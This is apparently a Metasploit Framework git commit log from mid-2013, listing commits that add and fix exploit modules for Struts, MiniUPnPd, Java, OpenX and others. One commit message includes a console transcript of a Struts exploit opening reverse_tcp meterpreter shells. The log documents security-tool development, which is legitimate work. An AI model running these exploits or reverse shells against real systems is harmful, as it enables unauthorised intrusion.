joernchen of Phenoelit
376c37d4cc
Two more fixes, Arch and unneeded include.
2013-08-09 09:23:50 +02:00
Tod Beardsley
155c121cbb
More spacing between ends
2013-08-08 16:35:38 -05:00
Tod Beardsley
f4fc0ef3fb
Moved classes into the Metasploit3 space
...
I'm just worried about all those naked classes just hanging around in
the top namespace. This shouldn't impact functionality at all.
While most modules don't define their own classes (this is usually the
job of Msf::Exploit and Rex), I can't think of a reason why you
shouldn't (well, aside from reusability). And yet, very rarely do
modules do it. It's not unknown, though -- the drda.rb capture module
defines a bunch of Constants, and the
post/windows/gather/credentials/bulletproof_ftp.rb module defines some
more interesting things.
So, this should be okay, as long as things are defined in the context of
the Metasploit module proper.
2013-08-08 16:22:34 -05:00
Tod Beardsley
4e166f3da4
Adding more blank lines between methods
...
For readability
2013-08-08 16:20:38 -05:00
jvazquez-r7
4a609504e3
Land #2199 , @jlee-r7's exploit for CVE-2013-4211
2013-08-08 14:57:28 -05:00
sinn3r
a03d71d60e
Land #2181 - More targets for hp_sys_mgmt_exec
...
Thanks mwulftange!
2013-08-08 13:35:33 -05:00
sinn3r
a73f87eaa5
No autodetect. Allow the user to manually select.
2013-08-08 13:34:25 -05:00
James Lee
080ca0b1b1
Use fail_with when failing instead of print_error
2013-08-08 13:12:39 -05:00
James Lee
ca7c0defe1
No need to rescue if we're just re-raising
2013-08-07 17:36:07 -05:00
James Lee
c808930f15
Add module for CVE-2013-4211, openx backdoor
2013-08-07 17:24:47 -05:00
HD Moore
c73e417531
Merge pull request #2171 from frederic/master
...
add new target in libupnp_ssdp_overflow exploit : Axis Camera M1011
2013-08-05 18:31:41 -07:00
Tod Beardsley
e7206af5b5
OSVDB and comment doc fixes
2013-08-05 09:08:17 -05:00
Markus Wulftange
9955899d9a
Minor formal fixes
2013-08-04 08:03:02 +02:00
Markus Wulftange
8cc07cc571
Merge Linux and Windows exploit in multi platform exploit
2013-08-02 18:49:03 +02:00
Frederic Basse
5e1def26aa
remove Axis M1011 fingerprint, may not be specific enough to be used automatically.
2013-07-30 09:54:33 +02:00
Tod Beardsley
7e539332db
Reverting disaster merge to 593363c5f
with diff
...
There was a disaster of a merge at 6f37cf22eb
that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).
What this commit does is simulate a hard reset, by doing thing:
git checkout -b reset-hard-ohmu
git reset --hard 593363c5f9
git checkout upstream-master
git checkout -b revert-via-diff
git diff --no-prefix upstream-master..reset-hard-ohmy > patch
patch -p0 < patch
Since there was one binary change, also did this:
git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf
Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.
2013-07-29 21:47:52 -05:00
Frederic Basse
63940d438e
add new target in libupnp_ssdp_overflow exploit : Axis Camera M1011
2013-07-30 01:56:10 +02:00
joernchen of Phenoelit
ac28dbe734
Minor typo fix
2013-07-28 19:44:44 +02:00
joernchen of Phenoelit
8cdd163150
Module polishing, thanks @todb-r7.
...
Two test-apps (Rails 3/4) are available for this module. Ping me if you want to use them.
2013-07-28 13:52:27 +02:00
joernchen of Phenoelit
7f3eccd644
Rails 3/4 RCE w/ token
2013-07-26 20:23:18 +02:00
jvazquez-r7
5014919198
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 09:02:20 -05:00
jvazquez-r7
7641aa3e63
Delete stop_service calls
2013-07-24 16:35:15 -05:00
jvazquez-r7
8dd7a664b4
Give a chance to FileDropper too
2013-07-24 08:57:43 -05:00
jvazquez-r7
04b9e3a3e6
Add module for CVE-2013-2251
2013-07-24 08:52:02 -05:00
jvazquez-r7
458ac5f289
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-17 15:02:33 -05:00
jvazquez-r7
73fd14a500
Fix [SeeRM #8239 ] NoMethodError undefined method
2013-07-16 15:59:52 -05:00
jvazquez-r7
c4485b127c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-04 19:43:38 -05:00
jvazquez-r7
8772cfa998
Add support for PLESK on php_cgi_arg_injection
2013-07-04 08:24:25 -05:00
jvazquez-r7
db00599d44
Move carberp_backdoor_exec to unix webapp exploits foler
2013-06-30 10:00:14 -05:00
Brian Wallace
d990c7f21f
Dat line
2013-06-29 09:46:36 -07:00
Brian Wallace
ec7c9b039a
Further refactoring requested
2013-06-29 09:45:22 -07:00
Brian Wallace
8542342ff6
Merge branch 'carberp_backdoor_exec' of git@github.com:bwall/metasploit-framework.git into carberp_backdoor_exec
2013-06-28 22:45:03 -07:00
Brian Wallace
b8cada9ab0
Applied some refactoring to decrease line count
2013-06-28 22:44:23 -07:00
(B)rian (Wall)ace
9486364cc4
Added Steven K's email
2013-06-28 15:31:17 -07:00
Brian Wallace
fe0e16183c
Carberp backdoor eval PoC
2013-06-28 14:47:13 -07:00
jvazquez-r7
3c1af8217b
Land #2011 , @matthiaskaiser's exploit for cve-2013-2460
2013-06-26 14:35:22 -05:00
jvazquez-r7
81a2d9d1d5
Merge branch 'module_java_jre17_provider_skeleton' of https://github.com/matthiaskaiser/metasploit-framework
2013-06-26 14:32:59 -05:00
jvazquez-r7
4fa789791d
Explain Ranking
2013-06-25 13:10:15 -05:00
jvazquez-r7
127300c62d
Fix also ruby module
2013-06-25 12:59:42 -05:00
jvazquez-r7
0c306260be
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-25 09:13:01 -05:00
sinn3r
4df943d1a2
CVE and OSVDB update
2013-06-25 02:06:20 -05:00
jvazquez-r7
e9fccb8dbd
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-24 22:07:48 -05:00
HD Moore
24b7d19ecc
Fix target regex and wfsdelay
2013-06-24 14:56:43 -05:00
jvazquez-r7
98fddb6ce1
up to date
2013-06-24 11:57:11 -05:00
jvazquez-r7
f7650a4b18
Fix wrong local variable
2013-06-24 11:35:26 -05:00
Matthias Kaiser
8a96b7f9f2
added Java7u21 RCE module
...
Click2Play bypass doesn't seem to work anymore.
2013-06-24 02:04:38 -04:00
jvazquez-r7
785639148c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-20 17:18:42 -05:00
William Vu
4cc1f2440d
Land #1996 , references for several modules
2013-06-20 11:32:55 -05:00
Steve Tornio
322ba27f0f
re-order refs
2013-06-20 11:17:23 -05:00
William Vu
22026352e6
Land #1995 , OSVDB reference for Gitorious
2013-06-20 10:51:51 -05:00
Steve Tornio
66f4424202
fix formatting
2013-06-20 10:41:14 -05:00
Steve Tornio
a3a5dec369
add osvdb ref 94441
2013-06-20 08:03:34 -05:00
Steve Tornio
a824a0583e
add osvdb ref 89059
2013-06-20 07:34:15 -05:00
Steve Tornio
89f649ab99
add osvdb ref 89026
2013-06-20 07:28:29 -05:00
Steve Tornio
2b55e0e0a6
add osvdb ref 64171
2013-06-20 07:17:22 -05:00
Steve Tornio
d19bd7a905
add osvdb 85739, cve 2012-5159, edb 21834
2013-06-20 07:01:59 -05:00
Steve Tornio
6cc7d9ccae
add osvdb ref 85446 and edb ref 20500
2013-06-20 06:54:06 -05:00
Steve Tornio
ee21120c04
add osvdb ref 85509
2013-06-20 06:47:10 -05:00
Steve Tornio
ade970afb8
add osvdb ref 89322
2013-06-20 06:44:22 -05:00
Steve Tornio
42690a5c48
add osvdb ref 77492
2013-06-20 06:38:47 -05:00
Steve Tornio
0dca5ede7e
add osvdb ref 78480
2013-06-20 06:07:08 -05:00
Steve Tornio
29bc169507
add osvdb ref 64171
2013-06-20 06:00:05 -05:00
jvazquez-r7
869438cb73
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-19 19:57:40 -05:00
James Lee
81b4efcdb8
Fix requires for PhpEXE
...
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
jvazquez-r7
fd397db6e0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-18 14:09:33 -05:00
sinn3r
b514124997
Land #1979 - OSVDB update
2013-06-18 10:42:09 -05:00
sinn3r
fbd16a2f3e
Land #1978 - OSVDB update
2013-06-18 10:41:33 -05:00
sinn3r
1e46f7df48
Land #1977 - OSVDB update
2013-06-18 10:40:55 -05:00
Steve Tornio
e278ac5061
add osvdb ref 91841
2013-06-18 06:41:30 -05:00
Steve Tornio
404a9f0669
add osvdb ref 89594
2013-06-18 06:25:57 -05:00
Steve Tornio
27158d89c7
add osvdb ref 89105
2013-06-18 06:15:29 -05:00
Steve Tornio
2afc90a8de
fix typos
2013-06-18 06:05:45 -05:00
Steve Tornio
2c3181b56b
add osvdb ref 90627
2013-06-18 05:59:39 -05:00
jvazquez-r7
de1561363e
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 16:43:33 -05:00
William Vu
b51349ed77
Land #1968 , OSVDB reference for ManageEngine
2013-06-17 10:30:05 -05:00
jvazquez-r7
8fac0aaf6b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 08:24:39 -05:00
Steve Tornio
e37a0b871f
add osvdb ref 86562
2013-06-17 06:04:54 -05:00
Steve Tornio
6e57ecab59
add osvdb ref 79246 and edb ref 18492
2013-06-17 05:58:00 -05:00
Steve Tornio
e17ccdda3a
add osvdb ref 68662
2013-06-16 18:11:13 -05:00
jvazquez-r7
11bf17b0d6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-15 11:55:22 -05:00
William Vu
0cf2751ec1
Land #1965 , OSVDB reference for pBot
2013-06-15 07:39:25 -05:00
Steve Tornio
d35dd73328
add osvdb ref 84913
2013-06-15 07:30:23 -05:00
William Vu
638175a6be
Land #1964 , OSVDB reference for StorageWorks
2013-06-15 07:27:43 -05:00
Steve Tornio
0c6157694f
add osvdb ref 82087
2013-06-15 07:22:32 -05:00
Steve Tornio
6e8b844954
add osvdb ref 89611
2013-06-15 07:12:44 -05:00
Steve Tornio
63483a979d
add osvdb ref 89611
2013-06-15 07:09:26 -05:00
jvazquez-r7
0b9cf213df
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-12 12:03:10 -05:00
Joe Vennix
45da645717
Update ff svg exploit description to be more accurate.
2013-06-11 12:12:18 -05:00
jvazquez-r7
b20a38add4
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-10 12:22:52 -05:00
Tod Beardsley
f58e279066
Cleanup on module names, descriptions.
2013-06-10 10:52:22 -05:00
jvazquez-r7
9d0047ff74
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-07 16:44:52 -05:00
jvazquez-r7
79bfdf3ca6
Add comment to explain the applet delivery methods
2013-06-07 14:20:21 -05:00
jvazquez-r7
641fd3c6ce
Add also the msf module
2013-06-07 13:39:19 -05:00
jvazquez-r7
6497e5c7a1
Move exploit under the linux tree
2013-06-04 08:53:18 -05:00
jvazquez-r7
0bf2f51622
Land #1843 , @viris exploit for CVE-2013-0230
2013-06-04 08:52:09 -05:00
jvazquez-r7
86c768ad02
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-04 08:15:28 -05:00
Dejan Lukan
8ced3483de
Deleted some undeeded comments and used the text_rand function rather than static values.
2013-06-04 08:44:47 +02:00
sinn3r
ad87065b9a
Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb
2013-06-04 01:35:13 -05:00
Ruslaideemin
71bc06d576
Fix undefined variable in tomcat_mgr_deploy.rb
...
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯 in `call'
lib/msf/core/thread_manager.rb💯 in `block in spawn'
Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
jvazquez-r7
4079484968
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-03 15:27:36 -05:00
Tod Beardsley
4cf682691c
New module title and description fixes
2013-06-03 14:40:38 -05:00
Dejan Lukan
df20e79375
Deleted the handle because it's not required and check() function.
2013-06-03 10:18:43 +02:00
Dejan Lukan
36f275d71a
Changed the send_request_raw into send_request_cgi function.
2013-06-03 10:06:24 +02:00
Dejan Lukan
675fbb3045
Deleted the DoS UPnP modules, because they are not relevant to the current branch.
2013-06-03 09:45:29 +02:00
Dejan Lukan
1ceed1e44a
Added corrected MiniUPnP module.
2013-06-03 09:37:04 +02:00
Dejan Lukan
d656360c24
Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability
2013-06-03 09:37:03 +02:00
Dejan Lukan
39e4573d86
Added CVE-2013-0229 for MiniUPnPd < 1.4
2013-06-03 09:37:03 +02:00
jvazquez-r7
f68d35f251
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-01 17:09:23 -05:00
Steve Tornio
80f1e98952
added osvdb refs
2013-06-01 07:04:43 -05:00
jvazquez-r7
48b14c09e3
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 01:12:46 -05:00
jvazquez-r7
146a30ec4d
Do minor cleanup for struts_include_params
2013-05-31 01:01:15 -05:00
jvazquez-r7
a7a754ae1f
Land #1870 , @Console exploit for Struts includeParams injection
2013-05-31 00:59:33 -05:00
Console
eb4162d41b
boolean issue fix
2013-05-30 18:15:33 +01:00
Console
5fa8ecd334
removed magic number 109
...
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Console
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
Console
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
Console
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
Console
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
Console
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
Console
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Console
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
Console
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
jvazquez-r7
66ea59b03f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-28 15:22:46 -05:00
Console
7b43117d87
Added RCE for Struts versions earlier than 2.3.14.2
...
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
Tod Beardsley
75d6c8079a
Spelling, whitespace
...
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
jvazquez-r7
d5cf6c1fbc
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-23 12:37:54 -05:00
sinn3r
81ad280107
Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
...
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r
67861794f6
Fix automatic payload selection
2013-05-22 22:37:18 -05:00
sinn3r
23fe3146dc
Extra print_status I don't want
2013-05-22 14:38:30 -05:00
sinn3r
0e6576747a
Fix target selection probs, and swf path
2013-05-22 14:34:00 -05:00
jvazquez-r7
0dee5ae94d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-22 12:54:44 -05:00
Joe Vennix
aae4768563
Fix whitespace issues from msftidy.
2013-05-21 14:31:36 -05:00
Joe Vennix
eaeb10742a
Add some comments and clean some things up.
2013-05-21 14:01:14 -05:00
Joe Vennix
978aafcb16
Add DEBUG option, pass args to .encoded_exe().
2013-05-21 14:01:14 -05:00
Joe Vennix
ee8a97419c
Add some debug print calls to investigate Auto platform selection.
2013-05-21 14:01:13 -05:00
Joe Vennix
60fdf48535
Use renegerate_payload(cli, ...).
2013-05-21 14:01:13 -05:00
James Lee
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7
0f3b13e21d
up to date
2013-05-16 15:02:41 -05:00
James Lee
3009bdb57e
Add a few more references for those without
2013-05-16 14:32:02 -05:00
h0ng10
378f0fff5b
added missing comma
2013-05-16 18:59:46 +02:00
Joe Vennix
1a5c747bb9
Update description.
2013-05-15 23:52:51 -05:00
Joe Vennix
178a43a772
Whitespace tweaks and minor bug fix. Wrong payloads still run.
2013-05-15 23:47:04 -05:00
Joe Vennix
f4b6db8c49
Tweak whitespace.
2013-05-15 23:35:59 -05:00
Joe Vennix
a7d79e2a51
Oops, don't cache payload_filename.
2013-05-15 23:34:14 -05:00
Joe Vennix
4d5c4f68cb
Initial commit, works on three OSes, but automatic mode fails.
2013-05-15 23:32:02 -05:00
jvazquez-r7
cb24d3ddae
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-15 11:13:29 -05:00
James Lee
61afe1449e
Landing #1275 , bash cmdstager
...
Conflicts:
lib/rex/exploitation/cmdstager.rb
Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00